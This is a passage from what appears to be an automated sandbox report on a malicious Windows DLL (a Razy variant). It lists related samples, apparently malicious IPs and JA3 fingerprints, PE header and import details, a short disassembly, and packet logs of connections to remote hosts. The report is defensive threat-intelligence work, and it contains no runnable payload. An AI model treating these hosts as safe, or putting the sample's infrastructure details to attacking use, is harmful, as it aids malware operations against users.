                      • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a767.dspw65.akamai.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      04:53:09API Interceptor178x Sleep call for process: rundll32.exe modified
                      04:53:12API Interceptor179x Sleep call for process: loaddll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      45.77.0.96SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                              185.56.219.47SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      KELIWEBITSecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):326
                                                                                                      Entropy (8bit):3.408463865828527
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKikXuyr8EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:KklW/Y2kPlE99SNxAhUefit
                                                                                                      MD5:DC907620685B6E2130D79E48BDDC80AC
                                                                                                      SHA1:539043F413C012DF0C6866BAB6FAD7E962401A21
                                                                                                      SHA-256:4D99855C4738F264EC7EA6530DCA0BD2FF033D019661F43581D1EBEA86EA98AE
                                                                                                      SHA-512:DF5CDD4754060BE2D3D32CC6558E050DC889D031CF2C6536489626992F9A753880BD1E59266CF30A377963B26BE8A83D015A588C8542BED4252970FC21FE6205
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: p...... .........6......(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.439720008501808
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:SecuriteInfo.com.Variant.Razy.980776.9478.dll
                                                                                                      File size:1375232
                                                                                                      MD5:6fd1917b9317cb3a563452406ee6b42e
                                                                                                      SHA1:ca04deff186c8177bc45b1d71fc0d9f7cd77e89e
                                                                                                      SHA256:a0a2052a31550ac810368f5aa8e2e9d4f309758e6b3391f9ba27c52ccb9f4ed5
                                                                                                      SHA512:f2de83a41ec97d6173c1efc5ef80d937d5354ed4b60cf22dfe435bb953102fd51d3979e0dfedd5c6d373996ff7bd54c1f864361bc016435915b3d182f4a05ef6
                                                                                                      SSDEEP:24576:rnxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu77:rcfk82uAJTI7bPswKwuK
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............E...E...E(VGE...E..'E...E...D...E...D...E...D...E...D...E(VCE...E...E...E...D...E...D...E..LE...E...D...ERich...E.......

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4336b0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x5BBD7676 [Wed Oct 10 03:48:06 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                      jne 00007FA920DBE737h
                                                                                                      call 00007FA920DBF467h
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      push ecx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      push edx
                                                                                                      call 00007FA920DBE526h
                                                                                                      add esp, 0Ch
                                                                                                      pop ebp
                                                                                                      retn 000Ch
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      push edx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      xor edx, dword ptr [0054806Ch]
                                                                                                      push edx
                                                                                                      call 00007FA920DBE774h
                                                                                                      add esp, 08h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      mov eax, 00000020h
                                                                                                      sub eax, edx
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                      push ecx
                                                                                                      call 00007FA920DBE743h
                                                                                                      add esp, 08h
                                                                                                      xor eax, dword ptr [0054806Ch]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      ror eax, cl
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      call 00007FA920DBFACDh
                                                                                                      push eax
                                                                                                      call 00007FA920E007D7h
                                                                                                      add esp, 04h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 18h
                                                                                                      mov eax, dword ptr [ebp+00h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xc5e2f0xc6000False0.442065922901data6.47812583733IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xc70000x80aec0x80c00False0.534103837985data5.52052205911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Bluewing10x49eed0
                                                                                                      Earth20x49efd0
                                                                                                      Masterjust30x49eb20

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 28, 2021 04:53:08.316519022 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:08.316570044 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:08.316683054 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:08.333946943 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:08.333977938 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:08.829534054 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:08.829684019 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:09.408591986 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:09.408618927 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:09.409007072 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:09.409090996 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:09.412317038 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:09.412426949 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:09.412455082 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.095457077 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.095546007 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.095654011 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:10.103123903 CEST49741443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:10.103167057 CEST44349741192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.260221958 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:10.387748003 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:10.387806892 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.387929916 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:10.416640043 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:10.416676998 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.417979002 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.420072079 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:10.420793056 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:10.578488111 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.579847097 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.579952002 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:10.901084900 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:10.901230097 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:11.717493057 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:11.717515945 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:11.717911005 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:11.717992067 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:11.793492079 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:11.793611050 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:11.793648005 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:12.478216887 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:12.478317022 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:12.478357077 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:12.478377104 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:12.608993053 CEST49743443192.168.2.3192.46.210.220
                                                                                                      Oct 28, 2021 04:53:12.609030008 CEST44349743192.46.210.220192.168.2.3
                                                                                                      Oct 28, 2021 04:53:12.861404896 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.021795988 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.021902084 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.028331041 CEST49745808192.168.2.3143.244.140.214
